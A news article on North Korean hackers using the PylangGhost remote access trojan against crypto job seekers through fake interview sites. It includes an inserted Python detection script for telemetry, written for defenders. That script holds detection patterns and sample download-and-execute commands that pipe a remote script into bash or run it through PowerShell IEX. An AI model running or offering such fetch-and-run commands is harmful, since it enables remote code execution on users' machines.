- Crypto job seekers are targeted by North Korean hackers using PylangGhost malware to steal sensitive data.
- Fake job interviews on phishing sites trick victims into installing malware and granting remote access.
- PylangGhost captures cookies, credentials, and system data from over 80 browser extensions and crypto wallets.
Crypto job seekers are the latest victims of a new malware campaign attributed to North Korean hackers. According to a Cisco Talos report, the remote access trojan, called PylangGhost, is built to extract sensitive information such as credentials for crypto wallets and password managers. The attacks mainly target people experienced in blockchain and cryptocurrency, with a concentration of victims in India.
The group responsible for the attacks is Famous Chollima, also tracked under the Wagemole campaign name. The gang uses fake job interviews to trick victims into downloading the malware. The scam sites impersonate real companies, including Coinbase, Robinhood, and Uniswap, and victims apply for the advertised roles and are led through a multi-stage phishing flow.
Source: Cisco Talos
The attackers first contact their targets while posing as recruiters. They direct them to phishing sites that mimic legitimate job portals. Once there, the victims are asked to grant camera and video access for a job interview. During these fake interviews, they are talked into running commands presented as a video driver update. Those commands infect the system with the malware, giving the attackers remote control of the machine.
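The lure step above ends with the victim pasting a "driver fix" one-liner into a terminal, which is the one point in the chain a defender can see in endpoint telemetry. The following is an added triage helper, not Cisco Talos tooling and not code from the campaign: it scans process-creation events for a remote download chained to inline execution, and adds context flags when the command came from an interactive shell or carries driver/camera wording. The event format, the hostnames, and the `example.invalid` URLs are constructed for this example.

```python
"""Flag download-and-execute one-liners of the kind used in fake-interview lures.

Constructed example: the ProcEvent shape and every sample line below are
invented; adapt the field mapping to your EDR's process-creation events.
"""
import re
from dataclasses import dataclass

# Tools that fetch content from the network (Unix and Windows variants).
DOWNLOADERS = re.compile(
    r"\b(?:curl|wget|Invoke-WebRequest|iwr|DownloadString|DownloadFile|bitsadmin)\b"
    r"|certutil(?:\.exe)?\s+-urlcache",
    re.I,
)
# Ways the fetched content is run in the same command line.
EXECUTORS = re.compile(
    r"\|\s*(?:ba|z)?sh\b"                  # curl ... | bash
    r"|\bIEX\b|Invoke-Expression"          # PowerShell inline eval
    r"|\b[cw]script(?:\.exe)?\b"           # VBS/JS host
    r"|&&\s*(?:sh|bash|python3?|cmd)\b",   # fetch && run
    re.I,
)
# Parents that indicate a human typed or pasted the command.
INTERACTIVE_PARENTS = {"bash", "zsh", "sh", "terminal", "powershell.exe",
                       "cmd.exe", "windowsterminal.exe"}
# Wording the article associates with the lure (hypothetical keyword list).
LURE_WORDS = re.compile(r"driver|camera|webcam|video|interview", re.I)


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # parent process image name
    cmdline: str  # full command line of the new process


def score(ev: ProcEvent) -> list[str]:
    """Return the list of indicators present in one event."""
    reasons = []
    if DOWNLOADERS.search(ev.cmdline):
        reasons.append("remote download")
    if EXECUTORS.search(ev.cmdline):
        reasons.append("inline execution")
    if ev.parent.lower() in INTERACTIVE_PARENTS:
        reasons.append("typed/pasted into a shell")
    if LURE_WORDS.search(ev.cmdline):
        reasons.append("driver/camera lure wording")
    return reasons


def triage(events: list[ProcEvent]) -> list[tuple[str, str, list[str]]]:
    """Keep only events that both download and execute in one command line.

    A lone download (API calls, package managers) or a lone '&& bash' after a
    git clone is normal developer activity and is deliberately not reported.
    """
    hits = []
    for ev in events:
        reasons = score(ev)
        if "remote download" in reasons and "inline execution" in reasons:
            hits.append((ev.host, ev.cmdline, reasons))
    return hits


# Constructed sample telemetry: two lure-style commands, two benign ones.
SAMPLE_EVENTS = [
    ProcEvent("mac-analyst-01", "zsh",
              "curl -k -s https://example.invalid/driver/fix.sh | bash"),
    ProcEvent("win-dev-07", "cmd.exe",
              "powershell -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://example.invalid/camera_update.ps1')\""),
    ProcEvent("ci-runner-02", "python3",
              "curl -s https://example.invalid/api/health"),
    ProcEvent("mac-analyst-01", "bash",
              "git clone https://github.com/example/repo && cd repo && bash setup.sh"),
]

if __name__ == "__main__":
    for host, cmd, reasons in triage(SAMPLE_EVENTS):
        print(f"[{host}] {cmd}\n    indicators: {', '.join(reasons)}")
```

Only the two lure-style commands are reported; the health-check `curl` and the `git clone && bash setup.sh` are left alone because each carries only half of the download-then-execute pattern. Treat the "typed/pasted into a shell" and lure-wording flags as prioritisation hints for an analyst, not as detection conditions on their own.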
Source: X
Crypto Malware Targets Wallets
PylangGhost is a Python-based variant of the previously documented GolangGhost RAT with similar functionality. Once deployed, the malware harvests cookies and stored credentials from more than 80 browser extensions, including password managers such as 1Password and cryptocurrency wallets such as MetaMask and Phantom. It can also take screenshots, manipulate files, and collect system information, giving the attackers persistent access to the compromised device.
Source: Cisco Talos
According to Talos researchers, the comments in the code suggest that artificial intelligence was unlikely to have been used to write the malware. The campaign fits a wider pattern of North Korean attacks on the industry: in April, a group linked to the $1.4 billion Bybit hack targeted crypto developers with malware-laced coding tests presented as job assessments.
Cyber threats to job seekers in the crypto industry are growing along with the industry itself. Security professionals recommend extra caution when applying for roles, particularly in the crypto market, where fraudulent job offers and bogus interview invitations are increasingly common. Stronger safeguards are needed to protect personal and professional data from these criminals.